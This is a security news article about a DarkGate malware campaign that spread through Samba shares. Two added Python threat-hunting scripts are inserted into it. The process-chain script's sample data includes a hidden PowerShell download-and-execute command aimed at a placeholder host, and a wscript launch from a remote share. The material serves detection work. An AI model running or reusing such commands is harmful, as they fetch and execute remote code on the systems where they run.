Indo Guard Online
Global Security

The DarkGate malware exploits Samba file shares in a short-lived campaign

By Admin · July 13, 2024 · 2 Mins Read


July 12, 2024Information hallMalware / cyber attacks

Cybersecurity researchers have shed light on a short-lived DarkGate malware campaign that used Samba file shares to initiate the infection.

Palo Alto Networks Unit 42 said the activity spanned March and April 2024, with the infection chains using servers running public-facing Samba file shares that hosted Visual Basic Script (VBS) and JavaScript files. Targets were located in North America, Europe, and parts of Asia.

“This was a relatively short campaign that shows how threat actors can creatively abuse legitimate tools and services to spread their malware,” security researchers Vishwa Thothathri, Yijie Sui, Anmol Maurya, Uday Pratap Singh and Brad Duncan said.


DarkGate, first observed in 2018, has since evolved into a malware-as-a-service (MaaS) offering used by a tightly controlled number of customers. It comes with capabilities to remotely control compromised hosts, execute code, mine cryptocurrency, launch reverse shells, and drop additional payloads.

Attacks involving the malware have become particularly common in recent months following the multinational law enforcement takedown of the QakBot infrastructure in August 2023.

The campaign documented by Unit 42 begins with Microsoft Excel (.xlsx) files that, when opened, prompt targets to click an embedded “Open” button, which in turn retrieves and runs VBS code hosted on a Samba share.

The VBS script is configured to retrieve and execute a PowerShell script, which is then used to download the AutoHotKey-based DarkGate package.

Alternative sequences that use JavaScript files instead of VBS are no different in that they are also designed to download and run the follow-on PowerShell script.
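The chain just described (Excel file, script host reading a .vbs or .js from a UNC share, PowerShell, AutoHotkey) is what a defender would hunt for in process-creation telemetry. The following is an added example, not Unit 42's or the article's code: it parses constructed Sysmon-style process-creation records (pid, parent pid, image, command line), reconstructs the chain, and grades each hit by how many stages were observed. The sample events, the TEST-NET addresses in them, and the pipe-delimited record format are assumptions made for the example.

```python
"""Hunt for the DarkGate Samba-share delivery chain in process-creation telemetry.

Added example, not Unit 42's or the article's code. Chain modelled:
EXCEL.EXE -> wscript/cscript running a .vbs/.js from a UNC (Samba) path
-> powershell.exe -> AutoHotkey.exe.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed process-creation events: pid|ppid|image|command line (assumed format).
# 4100-4350 model the full chain; 5000-5020 are a benign local macro;
# 6000-6010 are an Excel-to-cscript launch of a .js from a share with no follow-on stage.
SAMPLE_EVENTS = r"""
4100|1200|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|"EXCEL.EXE" C:\Users\u\Downloads\invoice.xlsx
4212|4100|C:\Windows\System32\wscript.exe|wscript.exe \\203.0.113.10\share\loader.vbs
4300|4212|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ep bypass -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')"
4350|4300|C:\Users\u\AppData\Local\Temp\AutoHotkey.exe|AutoHotkey.exe C:\Users\u\AppData\Local\Temp\script.ahk
5000|1200|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|"EXCEL.EXE" C:\Users\u\budget.xlsx
5010|5000|C:\Windows\System32\wscript.exe|wscript.exe C:\Users\u\macro.vbs
5020|5010|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -c Get-Date
6000|1200|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|"EXCEL.EXE" C:\Users\u\Downloads\quote.xlsx
6010|6000|C:\Windows\System32\cscript.exe|cscript.exe \\198.51.100.7\pub\stage1.js
"""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# A script on a UNC path (\\host\share\...) with a .vbs or .js extension.
UNC_SCRIPT = re.compile(r"\\\\\S+\.(?:vbs|js)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str

    @property
    def name(self) -> str:
        """Lower-cased image file name, e.g. 'wscript.exe'."""
        return self.image.rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> dict[int, Proc]:
    """Parse pipe-delimited records into a pid -> Proc map (insertion order kept)."""
    procs: dict[int, Proc] = {}
    for line in text.strip().splitlines():
        pid, ppid, image, cmdline = line.split("|", 3)
        procs[int(pid)] = Proc(int(pid), int(ppid), image, cmdline)
    return procs


def find_darkgate_chains(procs: dict[int, Proc]) -> list[dict]:
    """Return one finding per Excel-spawned script host that ran a script from a UNC path."""
    children: dict[int, list[Proc]] = defaultdict(list)
    for p in procs.values():
        children[p.ppid].append(p)

    findings = []
    for p in procs.values():
        if p.name not in SCRIPT_HOSTS:
            continue
        parent = procs.get(p.ppid)
        if parent is None or parent.name != "excel.exe":
            continue
        match = UNC_SCRIPT.search(p.cmdline)
        if not match:
            continue  # local script: not the Samba-share delivery described here
        stages = ["excel->script_host", "unc_script"]
        ps_children = [c for c in children[p.pid] if c.name in POWERSHELL]
        if ps_children:
            stages.append("powershell")
            if any(g.name == "autohotkey.exe"
                   for ps in ps_children for g in children[ps.pid]):
                stages.append("autohotkey")
        severity = {2: "medium", 3: "high", 4: "critical"}[len(stages)]
        findings.append({"pid": p.pid, "script": match.group(0),
                         "stages": stages, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in find_darkgate_chains(parse_events(SAMPLE_EVENTS)):
        print(finding)
```

Run as-is it prints two findings: the full chain under PID 4212 is graded critical, the Excel-to-cscript launch of a .js from a second share is graded medium because no follow-on stage was observed, and the local macro under PID 5010 is ignored. Excel spawning wscript.exe or cscript.exe is unusual enough in most environments to alert on by itself; the UNC-path condition is what ties the rule to this campaign's delivery method.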


DarkGate works by checking for various anti-malware programs and inspecting CPU information to determine whether it is running on a physical host or in a virtual environment, which lets it hinder analysis. It also checks running host processes for the presence of reverse engineering tools, debuggers, or virtualization software.

“DarkGate C2 traffic uses unencrypted HTTP requests, but the data is obfuscated and appears as Base64-encoded text,” the researchers said.
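That description suggests a simple triage rule for plaintext HTTP captures or proxy logs: a POST body that consists of one lone Base64-alphabet blob, and that either does not decode as standard Base64 or decodes to non-text bytes, is worth a look. The following is an added example, not the article's or Unit 42's code, and it does not reproduce DarkGate's actual encoding scheme: it applies that rule to constructed request tuples (method, URL, body) and skips HTTPS, whose bodies are not visible without interception. The sample bodies and the TEST-NET addresses are constructed for the example.

```python
"""Triage plaintext HTTP POST bodies for Base64-looking obfuscated C2 data.

Added example, not the article's or Unit 42's code; the heuristic is generic and
does not model DarkGate's real encoding.
"""
import base64
import binascii
import re

# A body that is nothing but a Base64-alphabet run (>= 32 chars) plus optional padding.
B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")
SUSPICIOUS = {"base64-like", "base64-binary"}

# Constructed samples (not real DarkGate traffic); hosts are TEST-NET addresses.
OBFUSCATED_BLOB = base64.b64encode(bytes((i * 73 + 11) % 256 for i in range(60))).decode()
BENIGN_B64 = base64.b64encode(b'{"user":"alice","session":"abc123"}').decode()
# 41 Base64-alphabet characters: one more than a multiple of four, so never valid Base64.
NONSTANDARD_BLOB = "".join(chr(65 + (i * 7) % 26) for i in range(41))

SAMPLE_REQUESTS = [
    ("POST", "http://203.0.113.45/index.php", OBFUSCATED_BLOB),
    ("POST", "http://198.51.100.9/app/login", "user=alice&pass=secret"),
    ("POST", "http://203.0.113.45/index.php", NONSTANDARD_BLOB),
    ("POST", "https://api.example.com/v1/session", BENIGN_B64),  # TLS: body not inspectable here
    ("POST", "http://198.51.100.9/api/token", BENIGN_B64),
    ("GET", "http://203.0.113.45/", ""),
]


def classify_body(body: str) -> str:
    """Return 'plain', 'base64-text', 'base64-binary' or 'base64-like' for one body."""
    body = body.strip()
    if not B64_BLOB.match(body):
        return "plain"  # form fields, JSON, etc.: not a lone Base64 blob
    try:
        raw = base64.b64decode(body, validate=True)
    except binascii.Error:
        return "base64-like"  # Base64 alphabet but undecodable: custom alphabet or bad length
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return "base64-binary"  # decodes, but to non-text bytes
    return "base64-text" if text.isprintable() else "base64-binary"


def hunt(requests: list[tuple[str, str, str]]) -> list[dict]:
    """Flag plaintext-HTTP POSTs whose body looks like obfuscated, Base64-styled data."""
    hits = []
    for method, url, body in requests:
        if method != "POST" or not url.lower().startswith("http://"):
            continue
        verdict = classify_body(body)
        if verdict in SUSPICIOUS:
            hits.append({"url": url, "verdict": verdict, "length": len(body.strip())})
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_REQUESTS):
        print(hit)
```

Legitimate Base64 that decodes to printable text (a JSON session token, for instance) is classified as base64-text and not flagged, which keeps the rule usable on real proxy logs; tune the 32-character minimum to the shortest beacon size you expect to see.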

“As DarkGate continues to evolve and refine its methods of penetration and resistance to analysis, it remains a powerful reminder of the need for robust and proactive cybersecurity protections.”






